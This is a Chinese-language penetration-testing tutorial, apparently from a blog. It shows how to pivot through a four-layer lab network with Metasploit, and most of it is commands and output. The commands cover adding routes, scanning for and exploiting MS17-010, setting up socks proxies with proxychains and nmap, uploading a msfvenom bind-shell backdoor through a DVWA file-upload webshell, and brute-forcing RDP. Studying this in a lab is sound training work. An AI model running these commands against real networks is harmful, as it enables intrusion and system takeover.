使用msf入侵多层级网络架构
假设,有一个多层网络环境结构,每层靶机只与相邻服务器互通,那么,如何从Hack的笔记本去获取Server5(10.0.3.2)的系统权限呢?
首先,我们通过Web入侵获得Server1权限,并通过横向渗透到Server2,探测到Server2存在双网卡。在这里,我们以Server2作为攻击跳板机继续入侵。
第1层靶机→第2靶机
1、获取内网网段信息
meterpreter > run get_local_subnets
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 10.0.0.0/255.255.255.0
Local subnet: 10.0.1.0/255.255.255.0
通过内网本地路由查询,可以获悉内网网段地址为:10.0.1.0/24。
2、添加去往第二层内网网段(10.0.1.0/24)的静态路由。
meterpreter > run autoroute -s 10.0.1.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.0.1.0/255.255.255.0...
[+] Added route to 10.0.1.0/255.255.255.0 via 10.0.0.3
[*] Use the -p option to list all active routes
3、扫描内网主机,使用msf下的扫描模块对IP段进行扫描看是否存来MS17-010漏洞。
use auxiliary/scanner/smb/smb_ms17_010
show options
set rhosts 10.0.1.0/24
set threads 50
run
通过扫描发现10.0.1.2存在MS-17010漏洞。
4、通过MS-17010漏洞获取Server3的系统权限。
use exploit/windows/smb/ms17_010_psexec
set rhost 10.0.1.2
set payload windows/meterpreter/bind_tcp
run
成功获取第二层靶机权限,查看ip地址,发现第三个网段。
第2层靶机→第3靶机
添加第三个网段的静态理由。
meterpreter > run autoroute -s 10.0.2.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.0.2.0/255.255.255.0...
[+] Added route to 10.0.2.0/255.255.255.0 via 10.0.1.2
[*] Use the -p option to list all active routes
使用MS17-010扫描无果,发现10.0.2.2主机存活,利用msf搭建socks代理
use auxiliary/server/socks4a
set srvport 9999
run
在攻击机Kali中,修改配置文件/etc/proxychains.conf
socks4 10.0.0.2 9999
使用proxychains 对第三层靶机进行端口扫描:
proxychains nmap -Pn -sT 10.0.2.2 -p1-1000
在Firefox中设置socks代理。
本地就可以直接访问到第三层靶机,在DVWA中,通过任意文件上传msf后门,获取站点权限。
利用msfvenom生成木马后门:
msfvenom -p windows/meterpreter/bind_tcp LPORT=8888 -f exe > shell.exe
use exploit/multi/handler
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST 10.0.2.2
set LPORT 8888
set ExitOnSession false
exploit -j -z
在webshell中,上传并成功执行shell.exe,成功返回Server4的权限。
第3层靶机→第4靶机
添加第四个网段的静态理由。
meterpreter > run autoroute -s 10.0.3.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.0.3.0/255.255.255.0...
[+] Added route to 10.0.3.0/255.255.255.0 via 10.0.2.2
[*] Use the -p option to list all active routes
开启socker
use auxiliary/server/socks4a
set srvport 6666
run
探测第四个网段存活的主机,发现10.0.3.2 开放了3389端口。
proxychains nmap -Pn -sT 10.0.3.0/24 -p22,80,3389
将第四层目标主机的3389流量转发到代理服务器中:
在本地对RDP账号密码进行爆破:
爆破成功后,使用账号密码成功登录服务器。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
· 【译】Visual Studio 中新的强大生产力特性
· 2025年我用 Compose 写了一个 Todo App
· 张高兴的大模型开发实战:(一)使用 Selenium 进行网页爬虫